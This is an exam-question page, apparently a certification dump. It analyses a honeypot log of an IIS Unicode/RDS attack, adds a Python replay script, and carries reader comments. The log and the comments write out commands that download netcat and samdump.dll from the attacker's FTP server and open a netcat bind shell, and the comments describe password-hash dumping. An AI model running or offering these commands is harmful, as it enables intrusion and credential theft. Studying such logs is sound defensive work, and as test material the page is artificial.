PrepAway - Latest Free Exam Questions & Answers

What can you infer from the exploit given?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below:

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo haxedj00 >>ftpcom”

“cmd1.exe /c echo get nc.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp s:ftpcom”

“cmd1.exe /c nc l p 6969 e-cmd1.exe”

What can you infer from the exploit given?

A.
It is a local exploit where the attacker logs in using username johna2k.

B.
There are two attackers on the system – johna2k and haxedj00.

C.
The attack is a remote exploit and the hacker downloads three files.

D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
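One way to make the inference the question asks for checkable, as an added example that is not part of the original question or its comments: replay the quoted cmd1.exe redirections to rebuild the staged ftpcom script, then read off the FTP server, the files fetched and the netcat listener options. It assumes the "-" characters of ftp -s and nc -l -p -e were stripped from the quoted log (as one commenter notes), so flags are matched with or without the dash, and that the first line was meant as an echo into the script.

```python
import re

# Constructed from the honeypot excerpt quoted in the question; the dashes of
# the ftp and nc flags are missing, as in the quoted text.
COMMANDS = [
    "cmd1.exe /c open 213.116.251.162 >ftpcom",
    "cmd1.exe /c echo johna2k >>ftpcom",
    "cmd1.exe /c echo haxedj00 >>ftpcom",
    "cmd1.exe /c echo get nc.exe >>ftpcom",
    "cmd1.exe /c echo get samdump.dll >>ftpcom",
    "cmd1.exe /c echo quit >>ftpcom",
    "cmd1.exe /c ftp s:ftpcom",
    "cmd1.exe /c nc l p 6969 e-cmd1.exe",
]

# "echo " is optional so the first (dash-less, echo-less) line is taken as
# the script's "open" entry, which is how the commenters read it.
REDIRECT = re.compile(r"^cmd1\.exe /c (?:echo )?(.*?)\s*(>>?)\s*(\S+)$")
NETCAT = re.compile(r"^cmd1\.exe /c nc\b(.*)$")

def rebuild_files(commands):
    """Replay > (truncate) and >> (append) to recover each staged file."""
    files = {}
    for cmd in commands:
        m = REDIRECT.match(cmd)
        if not m:
            continue
        text, op, name = m.groups()
        lines = files.setdefault(name, [])
        if op == ">":
            lines.clear()
        lines.append(text)
    return files

def summarize(commands):
    """Infer server, downloads and listener details from the replayed log."""
    script = rebuild_files(commands).get("ftpcom", [])
    summary = {"server": None, "downloads": [], "nc_port": None, "nc_udp": None}
    for line in script:
        parts = line.split()
        if parts and parts[0] == "open":
            summary["server"] = parts[1]        # remote FTP server address
        elif parts and parts[0] == "get":
            summary["downloads"].append(parts[1])
    for cmd in commands:
        m = NETCAT.match(cmd)
        if m:
            args = m.group(1)
            port = re.search(r"\bp\s+(\d+)", args)          # -p or p
            summary["nc_port"] = int(port.group(1)) if port else None
            summary["nc_udp"] = bool(re.search(r"(^|\s)-?u\b", args))  # -u
    summary["remote"] = summary["server"] is not None
    return summary
```

With the quoted log the summary shows two files fetched over TCP, which is what the comments below argue when weighing option C against D.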

4 Comments on “What can you infer from the exploit given?”

    1. Eddie Guerrero says:

      I just came upon this question today, and it’s pissing me off because it’s a little not right.

      Premise:
      The exploit works as said, commands are proxied to the command prompt system via unicode exploits (code red or Nimda likely). Through this you build an ftp script, upload exploit files and offer yourself up a command prompt for better command controls.

      FTP SCRIPTS:
      Ftp can be run manually, where you type everything, or by automated jobs run from the command prompt with a script you configure: “ftp s:{script you made}” http://www.computerhope.com/issues/ch001249.htm. You build your script to execute commands to mimic the info like in that link. Even in a hack with a limited interactive shell, you can’t open up notepad.exe there to build your ftp script; you’re in a shell only, you don’t have desktops and apps popping up! Even worse, here you’re just throwing queries hoping they execute on the server, through this exploit. You have to hope you typed things right, and that you have rights to run what you run; in this exploit you do.

      So “echo” will put the commands into the script file (ftpcom) and build it on the exploited machine (which is Windows here because it’s assuming cmd.exe as the command prompt; take notice it’s “cmd1.exe” running here, not cmd.exe, the real Windows command prompt).

      The first “greater than sign” alone means to create a new file called “ftpcom”, then lines with 2 greater than signs mean to APPEND to the existing ftpcom file, doing a line feed and carriage return for 1 line each. You put 1 extra space after each entry (but before the double greater than signs) because of that initial other interactive prompt of an ftp shell asking for input on your download ftp server. Failure to put that space after credentials (example: johna2k (1 space) >>ftpcom) will fail login (at least) for many FTP systems, from an interactive shell calling with scripts.

      That ftp script itself does the following:

      1) connect to rogue ftp server with IP address of 213.116.251.162
      2) enter ftp username of johna2k
      3) enter ftp password of haxedj00
      4) download nc.exe (netcat for backdoor opening)
      5) download samdump.dll (DLL injection file to print off hashes of password later in your attack- missing 2 other needed files though pwdump2.exe and lsass.exe)
      6) close the ftp session

      Ok, now that would only have FTP’d in “2” files to the target, not 3: nc.exe and samdump.dll. What 3rd file?

      Back to the example, “cmd1.exe /c ftp s:ftpcom” means just like you typed it yourself, you tell your fake CMD1.EXE command shell to run your ftp script and perform all the actions described above, on your behalf, to bring in your two files so you can make the machine run them.

      Then “cmd1.exe /c nc l p 6969 e-cmd1.exe” (not right, but whatever) means to tell your special command prompt to open up a NEW AND COMPLETELY SEPARATE PROCESS of CMD1.EXE and listen for a connection on port 6969 (with the netcat that you just ftp downloaded with the script) and execute a bind shell (waiting full command prompt) through that command prompt, to anyone who connects on port 6969 (remotely assumed here).

      Not listed: Next step you get a windows command prompt when you connect to that netcat backdoor on port 6969 (using netcat remotely to access that waiting shell).

      Knowledge Needed: ftp scripts + early unicode exploits + netcat options.

      Deciphering:
      honeypot = external entry + NIMDA or CODE RED RDS/MDAC exploits = remote exploit (A is eliminated)
      haxedj00 is the password entry in the file (B is eliminated)
      netcat command did not have the “-u” option so it did not use UDP (D is eliminated)

      … but “C”? What 3 files?
      I guess it’s assumed you first downloaded CMD“1”.EXE since that’s not a natural file on Windows; you must have uploaded your own command prompt earlier. It also doesn’t make sense you’d bring only samdump.dll and not the other 2 files in the pwdump package to grab the hashes. You can’t do anything with the file alone.

      Normally, Pwdump#.exe tells your uploaded fake version of lsass.exe to inject the samdump.dll file, and if you have elevated rights, you can grab the Windows password hashes. That’s back in the day. Nowadays there is an exe with everything bundled, or you grab it remotely.
      Either way you cut it, I showed you how to eliminate the other answers.

      1. Eddie Guerrero says:

        btw there are “minus” signs in front of those commands but I was unsure if they were stripped by commenting system here. “-s” for the ftp and netcat options.

  1. Marc G says:

    Using the exploit, the payload commands perform as such:

    Populate file ‘ftpcom’ with ftp commands
    1) open connection to server
    2) supply username
    3) supply password
    4) retrieve nc.exe file
    5) retrieve samdump.dll file
    6) close ftp session
    —————————————-
    cmd1.exe /c open 213.116.251.162 >ftpcom
    cmd1.exe /c echo johna2k >>ftpcom
    cmd1.exe /c echo haxedj00 >>ftpcom
    cmd1.exe /c echo get nc.exe >>ftpcom
    cmd1.exe /c echo get samdump.dll >>ftpcom
    cmd1.exe /c echo quit >>ftpcom

    Run ftp commands specified in file ‘ftpcom’
    ——————————————–
    cmd1.exe /c ftp s:ftpcom

    Run nc.exe that was just downloaded from hacker’s ftp server
    Listen on port 6969 and when connections are made run cmd1.exe (give command prompt)
    ———————————————–
    cmd1.exe /c nc l p 6969 e-cmd1.exe
